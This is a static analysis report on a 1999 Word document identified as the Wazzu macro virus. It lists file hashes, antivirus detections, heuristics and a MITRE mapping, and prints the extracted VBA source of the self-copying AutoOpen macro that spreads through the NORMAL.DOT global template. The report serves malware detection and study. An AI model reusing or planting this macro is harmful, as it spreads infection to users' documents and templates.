Wazzu — Office (OLE) malware analysis

Static analysis result for SHA-256 b01cc4f184d4df31…

MALICIOUS

Office (OLE)

33.5 KB Created: 1999-09-08 11:25:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 8084f03e719ddbced458bd524291c30d SHA-1: 0696ef7ac8b999d754889a8b5df06008785b157f SHA-256: b01cc4f184d4df3121e86d7fef7187d6804dd21472b30d1b91ad8d4ce90b675a
188 Risk Score

Malware Insights

Wazzu · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The presence of legacy WordBasic macro virus markers and a VBA AutoOpen macro strongly suggests malicious intent. The AutoOpen subroutine is designed to copy itself to the global template, potentially enabling persistence or further execution. ClamAV detections further confirm the malicious nature of the file, identifying it as a variant of Wazzu.

Heuristics 4

  • ClamAV: Doc.Trojan.Wazzu-47 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Wazzu-47
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "autoOpen"

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1442 bytes
SHA-256: 47514bda5e3c3ec9ac2bea61b0824b09a61ec2aea5671ea13de987589bd025b2
Detection
ClamAV: Doc.Trojan.Wazzu-11
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "autoOpen"

Public Sub MAIN()
Dim fileMacro$
Dim globMacro$
Dim MacroFile$
    On Error GoTo -1: On Error GoTo errCaught
        
    WordBasic.FileSummaryInfo Update:=1
    Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSummaryInfo(False)
    WordBasic.CurValues.FileSummaryInfo dlg

    fileMacro$ = dlg.Directory + "\" + dlg.FileName + ":autoOpen"
    globMacro$ = "Global:autoOpen"
    MacroFile$ = UCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10))

    If MacroFile$ = "NORMAL.DOT" Then
        WordBasic.MacroCopy globMacro$, fileMacro$
        WordBasic.FileSaveAs Format:=1
    Else
        WordBasic.MacroCopy fileMacro$, globMacro$
    
GoTo bye
errCaught:

bye:
    On Error GoTo -1: On Error GoTo 0

    End If
End Sub

Private Sub RndWord()
Dim wordNum
    WordBasic.FileSummaryInfo Update:=1
    Dim dlg As Object: Set dlg = WordBasic.DialogRecord.DocumentStatistics(False)
    WordBasic.CurValues.DocumentStatistics dlg

    wordNum = WordBasic.Int(Rnd() * WordBasic.Val(dlg.Words))
    WordBasic.StartOfDocument
    WordBasic.WordRight wordNum
End Sub